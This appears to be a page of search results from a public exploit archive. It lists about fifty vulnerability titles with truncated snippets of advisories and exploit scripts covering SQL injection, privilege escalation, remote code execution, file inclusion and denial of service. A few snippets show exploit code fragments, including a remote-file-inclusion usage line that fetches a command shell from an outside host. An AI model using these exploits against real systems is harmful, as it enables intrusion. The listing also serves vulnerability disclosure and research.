41207 matches found
wolfSSL 3.10.2 - x509 Certificate Text Parsing Off-by-One
wolfSSL 3.10.2 - x509 Certificate Text Parsing Off-by-One TALOS-2017-0293 WOLFSSL LIBRARY X509 CERTIFICATE TEXT PARSING CODE EXECUTION VULNERABILITY MAY 8, 2017 CVE-2017-2800 SUMMARY An exploitable off-by-one write vulnerability exists in the x509 certificate parsing functionality of wolfSSL...
Cisco IOS 12.2 12.4 15.0 15.6 - Security Association Negotiation Request Device Memory
Cisco IOS 12.2 12.4 15.0 15.6 - Security Association Negotiation Request Device Memory !/usr/bin/python -- coding: utf8 -- import socket from scapy.all import --------------------------- Requirements: $ sudo pip install scapy --------------------------- conf.verb = 0 RCVSIZE = 2548 TIMEOUT = 6...
dotCMS 3.6.1 - Blind Boolean SQL Injection
dotCMS 3.6.1 - Blind Boolean SQL Injection : ' Blind Boolean SQL Injection in dotCMS = 3.6.1 CVE-2017-5344 Product Description dotCMS is a scalable, java based, open source content management system CMS that has been designed to manage and deliver personalized, permission based content experience...
Microsoft Windows Kernel - win32k.sys Local Privilege Escalation (MS14-058)
Microsoft Windows Kernel - win32k.sys Local Privilege Escalation MS14-058 Sources: https://labs.mwrinfosecurity.com/assets/BlogFiles/mwri-lab-exploiting-cve-2014-4113.pdf https://github.com/sam-b/CVE-2014-4113 EDB Mirror:...
Orchard CMS 1.7.31.8.21.9.0 - Persistent Cross-Site Scripting
Orchard CMS 1.7.31.8.21.9.0 - Persistent Cross-Site Scripting ----------------- Background ----------------- Orchard is a free, open source, community-focused content management system written in ASP.NET platform using the ASP.NET MVC framework. Its vision is to create shared components for...
IBM Security AppScan Standard 9.0.2 - OLE Automation Array Remote Code Execution
IBM Security AppScan Standard 9.0.2 - OLE Automation Array Remote Code Execution !/usr/bin/python import BaseHTTPServer, socket IBM Security AppScan Standard OLE Automation Array Remote Code Execution Author: Naser Farhadi Linkedin: http://ir.linkedin.com/pub/naser-farhadi/85/b3b/909 Date: 1 June...
Sendio ESP - Information Disclosure
Sendio ESP - Information Disclosure 1. Advisory Information Title: Sendio ESP Information Disclosure Vulnerability Advisory ID: CORE-2015-0010 Advisory URL: http://www.coresecurity.com/advisories/sendio-esp-information-disclosure-vulnerability Date published: 2015-05-22 Date of last update:...
Persistent Systems Client Automation - Command Injection Remote Code Execution (Metasploit)
Persistent Systems Client Automation - Command Injection Remote Code Execution Metasploit Exploit Title: Persistent Systems Client Automation PSCA, formerly HPCA or Radia Command Injection Remote Code Execution Vulnerability Date: 2014-10-01 Exploit Author: Ben Turner Vendor Homepage: Previously...
AVG Internet Security 2015.0.5315 - Arbitrary Write Privilege Escalation
AVG Internet Security 2015.0.5315 - Arbitrary Write Privilege Escalation / Exploit Title - AVG Internet Security 2015 Arbitrary Write Privilege Escalation Date - 04th February 2015 Discovered by - Parvez Anwar @parvezghh Vendor Homepage - http://www.avg.com/ Tested Version - 2015.0.5315 Driver...
Microsoft-Office-2007-and-2010---OLE-Arbitrary-Command-Execution
CVE-2014-6352 OLE Remote Code Execution Author Abhishek Lyall - abhilyallatgmaildotcom, infoataslitsecuritydotcom Advanced Hacking Trainings - http://training.aslitsecurity.com Web - http://www.aslitsecurity.com/ Blog - http://www.aslitsecurity.blogspot.com/ Tested on win7 - office 2007 and 2010...
Enalean Tuleap 7.2 - XML External Entity File Disclosure
Enalean Tuleap 7.2 - XML External Entity File Disclosure Vulnerability title: Tuleap = 7.2 External XML Entity Injection in Enalean Tuleap CVE: CVE-2014-7177 Vendor: Enalean Product: Tuleap Affected version: 7.2 and earlier Fixed version: 7.4.99.5 Reported by: Jerzy Kramarz Details: A multiple XM...
Vivotek IP Cameras - Multiple Vulnerabilities
Vivotek IP Cameras - Multiple Vulnerabilities Core Security - Corelabs Advisory http://corelabs.coresecurity.com Vivotek IP Cameras Multiple Vulnerabilities 1. Advisory Information Title: Vivotek IP Cameras Multiple Vulnerabilities Advisory ID: CORE-2013-0301 Advisory URL:...
Joomla! 3.0.2 - highlight.php PHP Object Injection
Joomla! 3.0.2 - highlight.php PHP Object Injection Joomla! request-get'highlight', null, 'base64'; 58. $terms = $terms ? unserializebase64decode$terms : null; User input passed through the "highlight" parameter is not properly...
Konqueror 4.7.3 - Memory Corruption
Konqueror 4.7.3 - Memory Corruption -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 Nth Dimension Security Advisory NDSA20121010 Date: 10th October 2012 Author: Tim Brown URL: / Product: Konqueror 4.7.3 Vendor: KDE Risk: Medium Summary The Konqueror web browser is vulnerable to a number of memory...
Guru JustAnswer Professional 1.25 - Multiple SQL Injections
Guru JustAnswer Professional 1.25 - Multiple SQL Injections...
PHP 5.3.6 - shmop_read() Integer Overflow Denial of Service
PHP 5.3.6 - shmopread Integer Overflow Denial of Service...
Microsoft Windows - NTLM Weak Nonce (MS10-012)
Microsoft Windows - NTLM Weak Nonce MS10-012 Windows SMB NTLM Authentication Weak Nonce Vulnerability Security Advisory Hernan Ochoa - Agustin Azubel Title: Windows SMB NTLM Authentication Weak Nonce Vulnerability Advisory ID: OCHOA-2010-0209...
Microsoft Office - HtmlDlgHelper Class Memory Corruption (MS10-071)
Microsoft Office - HtmlDlgHelper Class Memory Corruption MS10-071 Core Security Technologies - CoreLabs Advisory http://corelabs.coresecurity.com Microsoft Office HtmlDlgHelper class memory corruption 1. Advisory Information Title: Microsoft Office HtmlDlgHelper class memory corruption Advisory I...
Orbital Viewer 1.04 - .orb File Local Universal Overflow (SEH)
Orbital Viewer 1.04 - .orb File Local Universal Overflow SEH !/usr/bin/python Orbital Viewer v1.04 .orb 0day Local Universal SEH Overflow Exploit Date: 27 Feb 2010 CVE: CVE-2010-0688 Download: http://www.orbitals.com/orb/ov.htm Found & exploited by: mrme http://net-ninja.net Greetz to:...
list Web - addlink.php?id SQL Injection
list Web - addlink.php?id SQL Injection list Web addlink.php id Remote SQL Injection Vulnerability Author: Hussin X Home : WwW.IQ-ty.CoM email: darkangelg85atYahooDoTcom script : http://maker.ir DorK :...
Web Directory PRO - Admins.php Change Admin Password
Web Directory PRO - Admins.php Change Admin Password change password Web Directory PRO MODIFY Login Password TypeSubadminAdmin Categories ArtBusinessComputersGamesHealth & FitnessNewsSportsRecreationInternetTeen & KidsReferenceEducationRegionalSocietyScienceHome & FamilyWorldShoppingWeb...
vSpin Classified System 2004 - cat.asp?cat SQL Injection
vSpin Classified System 2004 - cat.asp?cat SQL Injection source: https://www.securityfocus.com/bid/21190/info vSpin Classified System is prone to multiple input-validation vulnerabilities, including SQL-injection and cross-site scripting issues, because the application fails to sufficiently...
Les Visiteurs (Visitors) 2.0 - config.inc.php File Inclusion
Les Visiteurs Visitors 2.0 - config.inc.php File Inclusion lesvisit visiteurs = v2.0 lvcincludedir Remote File Include Vulnerability...
Invision Power Board 2.1.5 - lastdate Remote Code Execution
Invision Power Board 2.1.5 - lastdate Remote Code Execution !/usr/bin/perl Invision Power Board 2. commands execution exploit by RST/GHC vulnerable versions new Proto = "tcp", PeerAddr = "$host", PeerPort = "80" || die "- CONNECTION FAILED"; $login = s/./"%".ucsprintf"%2.2x",ord$1/eg; $password =...
phpHeaven phpMyChat 0.14.5 - admin.php3 Arbitrary File Access
phpHeaven phpMyChat 0.14.5 - admin.php3 Arbitrary File Access source: https://www.securityfocus.com/bid/10556/info phpHeaven phpMyChat is reported prone to multiple vulnerabilities. The issues result from insufficient sanitization of user-supplied data and design flaws. The following specific...
GUnet OpenEclass 1.7.3 E-learning platform - month SQL Injection
GUnet OpenEclass 1.7.3 E-learning platform - month SQL Injection Exploit Title: GUnet OpenEclass 1.7.3 E-learning platform - 'month' SQL Injection Google Dork: intext:"© GUnet 2003-2007" Date: 2020-03-02 Exploit Author: emaragkos Vendor Homepage: https://www.openeclass.org/ Software Link:...
PayPal-Credit Card-Debit Card Payment 1.0 - SQL Injection
PayPal-Credit Card-Debit Card Payment 1.0 - SQL Injection Exploit Title: PayPal/Credit Card/Debit Card Payment 1.0 - SQL Injection Dork: N/A Date: 2018-10-29 Exploit Author: Ihsan Sencan Vendor Homepage: https://www.sourcecodester.com/users/janobe Software Link:...
Umbraco CMS SeoChecker Plugin 1.9.2 - Cross-Site Scripting
Umbraco CMS SeoChecker Plugin 1.9.2 - Cross-Site Scripting Author Information Author : Ahmed Elhady Mohamed twitter : @AhmedELhady Date : 01/07/2018 Software Information Affected Software : SeoChecker Umbraco CMS Plug-in Version: version 1.9.2 Software website :...
Firefox 44.0.2 - ASM.JS JIT-Spray Remote Code Execution
Firefox 44.0.2 - ASM.JS JIT-Spray Remote Code Execution 46.0.1 -- CVE-2016-1960 and ASM.JS JIT-Spray "use strict" var Exploit = function this.asmjs = new Asmjs this.heap = new Heap Exploit.prototype.go = function / target address of fake node object / var nodetargetaddr = 0x20200000 / target...
Joomla! Component PrayerCenter 3.0.2 - sessionid SQL Injection
Joomla! Component PrayerCenter 3.0.2 - sessionid SQL Injection Exploit Title: Joomla! Component PrayerCenter 3.0.2 - SQL Injection Dork: N/A Date: 22.02.2018 Vendor Homepage: http://www.mlwebtechnologies.com/ Software Link:...
Linux Kernel 4.10.5 4.14.3 (Ubuntu) - DCCP Socket Use-After-Free
Linux Kernel 4.10.5 4.14.3 Ubuntu - DCCP Socket Use-After-Free / This is an announcement for CVE-2017-8824 which is a use-after-free vulnerability I found in Linux DCCP socket. It can be used to gain kernel code execution from unprivileged processes. You’ll find in attachment the proof of concept...
Linux Kernel - offset2lib Stack Clash
Linux Kernel - offset2lib Stack Clash / Linuxoffset2lib.c for CVE-2017-1000370 and CVE-2017-1000371 Copyright C 2017 Qualys, Inc. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation,...
Ansible 2.1.42.2.1 - Command Execution
Ansible 2.1.42.2.1 - Command Execution Computest security advisory CT-2017-0109 Summary: Command execution on Ansible controller from host Affected software: Ansible CVE: CVE-2016-9587 Reference URL: https://www.computest.nl/advisories/ CT-2017-0109Ansible.txt Affected versions: 2.1.4, 2.2.1...
Palo Alto Traps Server 3.1.2.1546 - Persistent Cross-Site Scripting
Palo Alto Traps Server 3.1.2.1546 - Persistent Cross-Site Scripting !/usr/bin/ruby =begin ------------------------------------------------------------------------ Product: Palo Alto Traps Server formerly Cyvera Endpoint Protection Vendor: Palo Alto Networks Vulnerable Versions: 3.1.2.1546 Tested...
OXID eShop 4.7.115.0.11 4.8.45.1.4 - Multiple Vulnerabilities
OXID eShop 4.7.115.0.11 4.8.45.1.4 - Multiple Vulnerabilities Exploit Title: OXID eShop v4.7.11/5.0.11 + v4.8.4/5.1.4 Multiple Vulnerabilities Google Dork: - Date: 12/2013 Exploit Author: //sToRm Vendor Homepage: http://www.oxid-esales.com Software Link: -...
MongoDB 2.2.3 - nativeHelper.apply Remote Code Execution
MongoDB 2.2.3 - nativeHelper.apply Remote Code Execution Title: MongoDB nativeHelper.apply Remote Code Execution Author: agixid http://blog.scrt.ch/2013/03/24/mongodb-0-day-ssji-to-rce/ Software Link: http://fastdl.mongodb.org/linux/mongodb-linux-i686-2.2.3.tgz Version: 2.2.3 The following PoC...
phpMyBitTorrent 2.04 - Multiple Vulnerabilities
phpMyBitTorrent 2.04 - Multiple Vulnerabilities waraxe-2012-SA091 - Multiple Vulnerabilities in phpMyBitTorrent 2.04 Author: Janek Vind "waraxe" Date: 01. October 2012 Location: Estonia, Tartu Web:...
Linux Kernel 2.6.33.3 - SCTP INIT Remote Denial of Service
Linux Kernel 2.6.33.3 - SCTP INIT Remote Denial of Service From: http://jon.oberheide.org/files/sctp-boom.py !/usr/bin/env python ''' sctp-boom.py Linux Kernel http://jon.oberheide.org Information: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1173 The sctpprocessunkparam function in...
WeBProdZ CMS - SQL Injection
WeBProdZ CMS - SQL Injection Exploit Title : WeBProdZ CMS SQL...
Apple Mac OSX 10.6 - HFS FileSystem (Denial of Service)
Apple Mac OSX 10.6 - HFS FileSystem Denial of Service // -----BEGIN PGP SIGNED MESSAGE----- // Hash: SHA1 / Proof of Concept for CVE-2010-0105 MacOS X 10.6 hfs file system attack Denial of Service by Maksymilian Arciemowicz from SecurityReason.com...
VP-ASP Shopping Cart 7.0 - Database Disclosure
VP-ASP Shopping Cart 7.0 - Database Disclosure Title : VP-ASP Shopping Cart 7.0 DB Download Vulnerability Author : indoushka Home : Souk Naamane - 04325 - Oum El Bouaghi ...
SeaMonkey 1.1.8 - Remote Array Overrun
SeaMonkey 1.1.8 - Remote Array Overrun From Full Disclosure: http://seclists.org/fulldisclosure/2009/Nov/221 -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 SeaMonkey 1.1.8 Remote Array Overrun Arbitrary code execution Author: Maksymilian Arciemowicz and sp3x http://SecurityReason.com Date: - - Dis...
Linux Kernel 2.42.6 (RedHat Linux 9 Fedora Core 4 11 Whitebox 4 CentOS 4) - sock_sendpage() Ring0 Privilege Escalation (5)
Linux Kernel 2.42.6 RedHat Linux 9 Fedora Core 4 11 Whitebox 4 CentOS 4 - socksendpage Ring0 Privilege Escalation 5 / 0x82-CVE-2009-2692 Linux kernel 2.4/2.6 32bit socksendpage local ring0 root exploit simple ver Tested RedHat Linux 9.0, Fedora core 411, Whitebox 4, CentOS 4.x. -- Discovered by...
PHPNews 0.93 - format_menue Remote File Inclusion
PHPNews 0.93 - formatmenue Remote File Inclusion...
Microsoft IIS 5.1 - Hit Highlighting Authentication Bypass
Microsoft IIS 5.1 - Hit Highlighting Authentication Bypass !/bin/sh NTLM && BASIC AUTH BYPASS : sha0atbadchecksum.net Based on my adv: https://www.securityfocus.com/bid/24105/info CVE-2007-2815 if $ != 2 then printf "USAGE:\t\t$0 \nExample:\t$0 http://www.microsoft.com /en/us/default.aspx\n\n";...
Auction 1.3m - phpbb_root_path Remote File Inclusion
Auction 1.3m - phpbbrootpath Remote File Inclusion !/usr/bin/perl phpBB auction mod - Remote File Inclusion Vuln Bug discovered by VietMafia code copier: webDEViL w3bd3vilatgmail.com code same as Fast Click perl wb1.pl http://vulnerable.com/ http://target.com/cmd.gif cmd cmd shell example: cmd...
KDE KMail 1.7.1 - HTML EMail Remote Email Content Spoofing
KDE KMail 1.7.1 - HTML EMail Remote Email Content Spoofing source: https://www.securityfocus.com/bid/13085/info A remote email message content spoofing vulnerability affects KDE KMail. This issue is due to a failure of the application to properly sanitize HTML email messages. An attacker may...
Webfroot Shoutbox 2.32 - Expanded.php Remote Command Execution
Webfroot Shoutbox 2.32 - Expanded.php Remote Command Execution source: https://www.securityfocus.com/bid/7772/info Shoutbox is prone to an issue that may result in the execution of attacker-supplied code. The vulnerability exists due to insufficient sanitization of input into the expanded.php...
Wordpress Plugin Tutor LMS 1.5.3 - Cross-Site Request Forgery (Add User)
Wordpress Plugin Tutor LMS 1.5.3 - Cross-Site Request Forgery Add User Exploit Title: Wordpress Plugin Tutor LMS 1.5.3 - Cross-Site Request Forgery Add User Date: 2020-01-30 Vendor Homepage: https://www.themeum.com/product/tutor-lms/ Vendor Changelog: https://wordpress.org/plugins/tutor/developer...
Core FTP LE 2.2 - Denial of Service (PoC)
Core FTP LE 2.2 - Denial of Service PoC Exploit Title: Core FTP LE 2.2 - Denial of Service PoC Date: 2020-25-02 Exploit Author: Ismael Nava Vendor Homepage: http://www.coreftp.com/ Software Link: http://www.coreftp.com/download.html Version: 2.2 build 1947 Tested on: Windows 10 Home x64 CVE : n/a...